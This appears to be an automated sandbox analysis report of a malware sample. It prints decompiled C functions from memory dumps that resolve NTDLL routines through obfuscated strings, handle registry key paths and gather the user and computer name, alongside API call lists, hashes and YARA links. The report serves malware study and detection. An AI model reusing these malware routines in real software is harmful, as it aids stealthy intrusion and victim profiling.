Part of subcall function 022B29C0: WaitForMultipleObjects.KERNEL32(00000002,022BA923,00000000,022BA923,?,?,?,022BA923,0000EA60), ref: 022B29DB

Part of subcall function 022B8B22: RtlFreeHeap.NTDLL(00000000,00000000,022B131A,00000000,?,?,00000000), ref: 022B8B2E

GetLastError.KERNEL32(00000000), ref: 022B58C2

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID:
API String ID: 3369646462-0
Opcode ID: f2ead24e99b00b5c671e2c6870d5cfa91a143123e0e3b74903ce2e51b0f50feb
Instruction ID: 431767a50bd819ebcdb21c67e2aa7bcbe30d82f9cdf2ddce47331c1d3a71e7a0
Opcode Fuzzy Hash: f2ead24e99b00b5c671e2c6870d5cfa91a143123e0e3b74903ce2e51b0f50feb
Instruction Fuzzy Hash: 3B314FB5D10309EFDF22EFE4C8849DEB7F8EF08344F50496AE502A6154D7709A549F50

Uniqueness

Uniqueness Score: -1.00%

Function 022B7B8D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E022B7B8D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x22bd2a8; // 0x24ba5a8
				_t1 = _t9 + 0x22be62c; // 0x253d7325
				_t36 = 0;
				_t28 = E022BA055(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E022B1525(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E022B1188(_t34, _t41, _a8);
						E022B8B22(_t41);
						_t42 = E022B976F(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E022B8B22(_t36);
							_t36 = _t42;
						}
						_t43 = E022BA41C(_t36, _t33);
						if(_t43 != 0) {
							E022B8B22(_t36);
							_t36 = _t43;
						}
					}
					E022B8B22(_t28);
				}
				return _t36;
			}

0x022b7b8d
0x022b7b90
0x022b7b91
0x022b7b99
0x022b7ba0
0x022b7ba7
0x022b7bab
0x022b7bb1
0x022b7bb8
0x022b7bbd
0x022b7bcf
0x022b7bd3
0x022b7bd7
0x022b7bdd
0x022b7be2
0x022b7bf2
0x022b7bf4
0x022b7c0b
0x022b7c0f
0x022b7c12
0x022b7c17
0x022b7c17
0x022b7c20
0x022b7c24
0x022b7c27
0x022b7c2c
0x022b7c2c
0x022b7c24
0x022b7c2f
0x022b7c2f
0x022b7c3a

APIs

Part of subcall function 022BA055: lstrlen.KERNEL32(00000000,00000000,00000000,7691C740,?,?,?,022B7BA7,253D7325,00000000,00000000,7691C740,?,?,022B9DA0,?), ref: 022BA0BC
Part of subcall function 022BA055: sprintf.NTDLL ref: 022BA0DD

lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,022B9DA0,?,047795B0), ref: 022B7BB8
lstrlen.KERNEL32(?,?,?,022B9DA0,?,047795B0), ref: 022B7BC0

Part of subcall function 022B1525: RtlAllocateHeap.NTDLL(00000000,00000000,022B1278), ref: 022B1531

strcpy.NTDLL ref: 022B7BD7
lstrcat.KERNEL32(00000000,?), ref: 022B7BE2

Part of subcall function 022B1188: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,022B7BF1,00000000,?,?,?,022B9DA0,?,047795B0), ref: 022B119F

Part of subcall function 022B8B22: RtlFreeHeap.NTDLL(00000000,00000000,022B131A,00000000,?,?,00000000), ref: 022B8B2E

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,022B9DA0,?,047795B0), ref: 022B7BFF

Part of subcall function 022B976F: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,022B7C0B,00000000,?,?,022B9DA0,?,047795B0), ref: 022B9779
Part of subcall function 022B976F: _snprintf.NTDLL ref: 022B97D7

Strings

=, xrefs: 022B7BF9

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: bc9851dd03170e67e77fce5c59531e306c516d181721ef2355b4f6516df3280b
Instruction ID: 03b0b66c707e13ae7f3812a1e151a3492adec3ab538d8709cff5e3e816bc5a65
Opcode Fuzzy Hash: bc9851dd03170e67e77fce5c59531e306c516d181721ef2355b4f6516df3280b
Instruction Fuzzy Hash: 7B11C1739213266B47137FF4AC48CEEBAAEDE88BD03150515F504E7108DF24D9024BA1

Uniqueness

Uniqueness Score: -1.00%

Function 022B944A, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 022B94A4
SysAllocString.OLEAUT32(0070006F), ref: 022B94B8
SysAllocString.OLEAUT32(00000000), ref: 022B94CA
SysFreeString.OLEAUT32(00000000), ref: 022B9532
SysFreeString.OLEAUT32(00000000), ref: 022B9541
SysFreeString.OLEAUT32(00000000), ref: 022B954C

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 345ee512872c6a0513b84ba6dad5941def561bec13d0459c37cba93c8424c909
Instruction ID: 189d41def1d2386a196829e74235aa9e532ad590b66e6625abe8ce05b0182a58
Opcode Fuzzy Hash: 345ee512872c6a0513b84ba6dad5941def561bec13d0459c37cba93c8424c909
Instruction Fuzzy Hash: BD416F35D50609AFDB02DFF8D8446DEB7BAAF49300F144426EA10EB210DB71D945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 022B4944, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E022B4944(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E022B1525(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x22bd2a8; // 0x24ba5a8
					_t1 = _t23 + 0x22be11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x22bd2a8; // 0x24ba5a8
					_t2 = _t26 + 0x22be769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E022B8B22(_t54);
					} else {
						_t30 =  *0x22bd2a8; // 0x24ba5a8
						_t5 = _t30 + 0x22be756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x22bd2a8; // 0x24ba5a8
							_t7 = _t33 + 0x22be40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x22bd2a8; // 0x24ba5a8
								_t9 = _t36 + 0x22be4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x22bd2a8; // 0x24ba5a8
									_t11 = _t39 + 0x22be779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E022B5CD1(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x022b4953
0x022b4957
0x022b4a19
0x022b495d
0x022b495d
0x022b4962
0x022b4975
0x022b4977
0x022b497c
0x022b4984
0x022b498b
0x022b498d
0x022b4992
0x022b4a11
0x022b4a12
0x022b4994
0x022b4994
0x022b4999
0x022b49a1
0x022b49a3
0x022b49a8
0x00000000
0x022b49aa
0x022b49aa
0x022b49af
0x022b49b7
0x022b49b9
0x022b49be
0x00000000
0x022b49c0
0x022b49c0
0x022b49c5
0x022b49cd
0x022b49cf
0x022b49d4
0x00000000
0x022b49d6
0x022b49d6
0x022b49db
0x022b49e3
0x022b49e5
0x022b49ea
0x00000000
0x022b49ec
0x022b49f2
0x022b49f7
0x022b49fe
0x022b4a03
0x022b4a08
0x00000000
0x022b4a0a
0x022b4a0d
0x022b4a0d
0x022b4a08
0x022b49ea
0x022b49d4
0x022b49be
0x022b49a8
0x022b4992
0x022b4a27

APIs

Part of subcall function 022B1525: RtlAllocateHeap.NTDLL(00000000,00000000,022B1278), ref: 022B1531

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,022B34A1,?,00000001,?,?,00000000,00000000), ref: 022B4969
GetProcAddress.KERNEL32(00000000,7243775A), ref: 022B498B
GetProcAddress.KERNEL32(00000000,614D775A), ref: 022B49A1
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 022B49B7
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 022B49CD
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 022B49E3

Part of subcall function 022B5CD1: memset.NTDLL ref: 022B5D50

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: 44a448861f4fb351a0760bbe6b625d908d6be5365b7d1f95127af3d2b3fd4f06
Instruction ID: 897adfcf400c41a9d088281bc0bacaa97a6e718176b2996c0605b358ff650680
Opcode Fuzzy Hash: 44a448861f4fb351a0760bbe6b625d908d6be5365b7d1f95127af3d2b3fd4f06
Instruction Fuzzy Hash: 2B2171B095020AAFD712EFE9DC94DEAB7ECEF053447010425E905D7212E774E904DB64

Uniqueness

Uniqueness Score: -1.00%

Function 022B4B2A, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E022B4B2A(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x22bd33c);
					_t91 = 0x80000002;
					L6:
					_t59 = E022B7B3B( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E022B8C52(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E022B8B22(_a8);
						goto L29;
					}
					_t64 =  *0x22bd278; // 0x4779c18
					_t16 = _t64 + 0xc; // 0x4779d3a
					_t65 = E022B7B3B(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d022bc0
						if(E022BA38F(_t97,  *_t33, _t91, _a8,  *0x22bd334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x22bd2a8; // 0x24ba5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x22bea3f; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x22be8e7; // 0x55434b48
								_t69 = _t34;
							}
							if(E022B8F85(_t69,  *0x22bd334,  *0x22bd338,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x22bd2a8; // 0x24ba5a8
									_t44 = _t71 + 0x22be846; // 0x74666f53
									_t73 = E022B7B3B(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d022bc0
										E022B4538( *_t47, _t91, _a8,  *0x22bd338, _a24);
										_t49 = _t101 + 0x10; // 0x3d022bc0
										E022B4538( *_t49, _t91, _t99,  *0x22bd330, _a16);
										E022B8B22(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d022bc0
									E022B4538( *_t40, _t91, _a8,  *0x22bd338, _a24);
									_t43 = _t101 + 0x10; // 0x3d022bc0
									E022B4538( *_t43, _t91, _a8,  *0x22bd330, _a16);
								}
								if( *_t101 != 0) {
									E022B8B22(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d022bc0
					_t81 = E022B7DDD( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d022bc0
							E022BA38F(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E022B8B22(_t100);
						_t98 = _a16;
					}
					E022B8B22(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E022BA789(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x22bd33c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

0x022b4b2a
0x022b4b33
0x022b4b3a
0x022b4b3f
0x022b4bac
0x022b4bb2
0x022b4bb7
0x022b4bbe
0x022b4bc3
0x022b4bc8
0x022b4d33
0x022b4d3a
0x022b4d3a
0x022b4d3f
0x022b4d41
0x022b4d41
0x022b4d4a
0x022b4d4a
0x022b4bce
0x022b4bda
0x022b4d29
0x022b4d2c
0x00000000
0x022b4d2c
0x022b4be0
0x022b4be5
0x022b4be8
0x022b4bed
0x022b4bf2
0x022b4c3b
0x022b4c3b
0x022b4c4e
0x022b4c58
0x022b4c5e
0x022b4c65
0x022b4c6f
0x022b4c6f
0x022b4c67
0x022b4c67
0x022b4c67
0x022b4c67
0x022b4c91
0x022b4c99
0x022b4cc7
0x022b4ccc
0x022b4cd3
0x022b4cd8
0x022b4cdc
0x022b4d0e
0x022b4cde
0x022b4ceb
0x022b4cee
0x022b4cfe
0x022b4d01
0x022b4d07
0x022b4d07
0x022b4c9b
0x022b4ca8
0x022b4cab
0x022b4cbd
0x022b4cc0
0x022b4cc0
0x022b4d18
0x022b4d24
0x022b4d1a
0x022b4d1d
0x022b4d1d
0x022b4d18
0x022b4c91
0x00000000
0x022b4c58
0x022b4c01
0x022b4c04
0x022b4c0b
0x022b4c11
0x022b4c14
0x022b4c16
0x022b4c22
0x022b4c25
0x022b4c25
0x022b4c2b
0x022b4c30
0x022b4c30
0x022b4c36
0x00000000
0x022b4c36
0x022b4b44
0x00000000
0x022b4b6b
0x022b4b6b
0x022b4b77
0x022b4b8a
0x022b4b90
0x022b4b98
0x00000000
0x022b4b98

APIs

StrChrA.SHLWAPI(022B9900,0000005F,00000000,00000000,00000104), ref: 022B4B5D
lstrcpy.KERNEL32(?,?), ref: 022B4B8A

Part of subcall function 022B7B3B: lstrlen.KERNEL32(?,00000000,04779C18,00000000,022B5142,04779E3B,?,?,?,?,?,69B25F44,00000005,022BD00C), ref: 022B7B42
Part of subcall function 022B7B3B: mbstowcs.NTDLL ref: 022B7B6B
Part of subcall function 022B7B3B: memset.NTDLL ref: 022B7B7D

Part of subcall function 022B4538: lstrlenW.KERNEL32(?,?,?,022B4CF3,3D022BC0,80000002,022B9900,022B5C8D,74666F53,4D4C4B48,022B5C8D,?,3D022BC0,80000002,022B9900,?), ref: 022B455D

Part of subcall function 022B8B22: RtlFreeHeap.NTDLL(00000000,00000000,022B131A,00000000,?,?,00000000), ref: 022B8B2E

lstrcpy.KERNEL32(?,00000000), ref: 022B4BAC

Strings

\, xrefs: 022B4B90
(, xrefs: 022B4C0D

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: 574a244d4f1fde2d328a8ed0795f4d2b2ed177d1604b470d35ee9f45aa73eb44
Instruction ID: a098dc424035b969a399fe591ab368c2cd9612175aee1f6271a438a6564d6ed7
Opcode Fuzzy Hash: 574a244d4f1fde2d328a8ed0795f4d2b2ed177d1604b470d35ee9f45aa73eb44
Instruction Fuzzy Hash: C7516B7252020AAFDF13AFE0EC94EEA7BBAEF44394F008914F9559612AD731D925DF10

Uniqueness

Uniqueness Score: -1.00%

Function 0042A59E, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042A612
__aullrem.LIBCMT ref: 0042A7DF
__aulldiv.LIBCMT ref: 0042A801

Strings

0, xrefs: 0042A5CD
9, xrefs: 0042A812

Memory Dump Source

Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 0$9
API String ID: 3120068967-1975997740
Opcode ID: be6e887e12e853b3a474f5b4eec608737560e6f0e8a9116a0579e6938cc35f91
Instruction ID: 6361b81019eb8333fad45a4e855a4514e7448bc63b8c1a38007d0fd3dc644a85
Opcode Fuzzy Hash: be6e887e12e853b3a474f5b4eec608737560e6f0e8a9116a0579e6938cc35f91
Instruction Fuzzy Hash: 28412871E05228DFDB20CF58D889BAEB7B1FB84304F5481DAD449A7240C7389E91CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 0042C1F3, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042C25A
__aullrem.LIBCMT ref: 0042C42A
__aulldiv.LIBCMT ref: 0042C44C

Strings

', xrefs: 0042C1F3
9, xrefs: 0042C45D

Memory Dump Source

Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: '$9
API String ID: 3120068967-1823400153
Opcode ID: dcdeadc3c3ff2a0e65cecbf096a6997c6b24477cf50909c6d89c3f9eeba8a92f
Instruction ID: a4ab00b61622b96220ac56cbfdb55f28e6a07888e9126e169b7f4c36ff8b525d
Opcode Fuzzy Hash: dcdeadc3c3ff2a0e65cecbf096a6997c6b24477cf50909c6d89c3f9eeba8a92f
Instruction Fuzzy Hash: 5E4124B1E00229DFDB24CF48D881BAEB7B5FF85314F50849AD549AB200C7789E81CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 022B9FF6, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E022B9FF6() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x22bd32c; // 0x47795b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x22bd32c; // 0x47795b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x22bd32c; // 0x47795b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x22be81a) {
					HeapFree( *0x22bd238, 0, _t10);
					_t7 =  *0x22bd32c; // 0x47795b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x022b9ff6
0x022b9fff
0x022ba00f
0x022ba00f
0x022ba014
0x022ba019
0x00000000
0x00000000
0x022ba009
0x022ba009
0x022ba01b
0x022ba020
0x022ba024
0x022ba037
0x022ba03d
0x022ba03d
0x022ba046
0x022ba048
0x022ba04c
0x022ba052

APIs

RtlEnterCriticalSection.NTDLL(04779570), ref: 022B9FFF
Sleep.KERNEL32(0000000A,?,022B30F3), ref: 022BA009
HeapFree.KERNEL32(00000000,?,?,022B30F3), ref: 022BA037
RtlLeaveCriticalSection.NTDLL(04779570), ref: 022BA04C

Strings

Ut, xrefs: 022BA037

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Ut
API String ID: 58946197-8415677
Opcode ID: 50eaff3c091971243e7131359e4148fb09dfbb40894079aa16f3b0ef6a4092ed
Instruction ID: 7d932b2c0eb05c41dd585c65ba7ed001716a2b63672b21da1326dad9931da57c
Opcode Fuzzy Hash: 50eaff3c091971243e7131359e4148fb09dfbb40894079aa16f3b0ef6a4092ed
Instruction Fuzzy Hash: E2F0B278A941419FE72A8BE4E84DFA577E4AF08384B488C09E942CB265C734AC60CE21

Uniqueness

Uniqueness Score: -1.00%

Function 022B9267, Relevance: 7.6, APIs: 5, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E022B9267() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E022B1525(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E022B8B22(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x22b9cb2
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}

0x022b9275
0x022b9278
0x022b927b
0x022b9281
0x022b9286
0x022b928c
0x022b9294
0x022b9297
0x022b929d
0x022b92a2
0x022b92af
0x022b92bc
0x022b92c0
0x022b92c2
0x022b92c6
0x022b92c9
0x022b92d9
0x022b932c
0x022b932d
0x022b92db
0x022b92e0
0x022b92e1
0x022b92e6
0x022b92e9
0x022b92fc
0x00000000
0x022b92fe
0x022b9301
0x022b9306
0x022b9314
0x022b9317
0x022b931d
0x022b9322
0x00000000
0x022b9324
0x022b9324
0x022b9327
0x022b9327
0x022b9322
0x022b92fc
0x022b9332
0x022b9333
0x022b92a2
0x022b9339

APIs

GetUserNameW.ADVAPI32(00000000,022B9CB0), ref: 022B927B
GetComputerNameW.KERNEL32(00000000,022B9CB0), ref: 022B9297

Part of subcall function 022B1525: RtlAllocateHeap.NTDLL(00000000,00000000,022B1278), ref: 022B1531

GetUserNameW.ADVAPI32(00000000,022B9CB0), ref: 022B92D1
GetComputerNameW.KERNEL32(022B9CB0,?), ref: 022B92F4
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,022B9CB0,00000000,022B9CB2,00000000,00000000,?,?,022B9CB0), ref: 022B9317

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID:
API String ID: 3850880919-0
Opcode ID: 133e655d7b9a55bf846b051f51647740f202c748c45396805898d11f3ad2f372
Instruction ID: 3b56bbf0ac871cddeba5afa76988534f86cde8ee1bf06dd8555af6f33b6f8dbf
Opcode Fuzzy Hash: 133e655d7b9a55bf846b051f51647740f202c748c45396805898d11f3ad2f372
Instruction Fuzzy Hash: C921D776D10209FFCB12DFE8D9889EEBBB8EF44344B5448AAE601E7244D7309B55DB50

Uniqueness

Uniqueness Score: -1.00%

Function 022B9EBB, Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E022B9EBB(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x22bd26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x22bd25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x22bd258 = _t6;
					 *0x22bd264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x22bd254 = _t7;
					if(_t7 == 0) {
						 *0x22bd254 =  *0x22bd254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}

0x022b9ec3
0x022b9ec9
0x022b9ed0
0x00000000
0x022b9f2a
0x022b9ed2
0x022b9eda
0x022b9ee7
0x022b9ee7
0x022b9f27
0x00000000
0x022b9f27
0x022b9ee9
0x022b9ee9
0x022b9eee
0x022b9f00
0x022b9f05
0x022b9f0b
0x022b9f11
0x022b9f18
0x022b9f1a
0x022b9f1a
0x00000000
0x022b9f21
0x022b9ee3
0x00000000
0x00000000
0x022b9ee5
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,022B27C3,?,?,00000001,?,?,?,022B7F25,?), ref: 022B9EC3
GetVersion.KERNEL32(?,00000001,?,?,?,022B7F25,?), ref: 022B9ED2
GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,022B7F25,?), ref: 022B9EEE
